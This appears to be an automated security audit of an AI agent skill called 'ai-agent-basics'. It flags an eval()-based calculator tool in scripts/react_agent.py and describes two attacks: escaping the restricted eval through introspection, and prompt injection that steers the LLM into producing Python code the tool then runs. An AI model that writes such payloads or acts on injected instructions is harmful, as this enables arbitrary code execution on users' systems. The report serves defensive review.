ai-agent-basics

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGHCOMMAND_EXECUTIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
  • [COMMAND_EXECUTION] (HIGH): Insecure code execution via eval() in scripts/react_agent.py.
  • Evidence: File scripts/react_agent.py, Line 84: result = eval(tool_input["expression"], {"__builtins__": {}}, {}).
  • Risk: Python's eval() is fundamentally difficult to sandbox. Attackers can use introspection techniques (e.g., accessing __class__ attributes of basic types) to retrieve references to the os module or other dangerous built-ins, bypassing the provided restrictions to execute arbitrary system commands.
  • [REMOTE_CODE_EXECUTION] (HIGH): Indirect RCE through LLM tool calling.
  • Ingestion Point: User-provided query in scripts/react_agent.py enters the LLM context.
  • Capability Inventory: The calculator tool allows the LLM to execute Python code via eval().
  • Risk: An attacker can use prompt injection to trick the LLM into generating a malicious Python payload. Because the LLM's output is directly evaluated, this creates a path for remote code execution.
  • [EXTERNAL_DOWNLOADS] (LOW): Dependency on external libraries.
  • Evidence: SKILL.md and scripts/react_agent.py reference langgraph and langchain-anthropic.
  • Status: These are trusted libraries from known organizations, though not on the explicit whitelist. Usage is standard for the skill's purpose.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Feb 17, 2026, 08:11 AM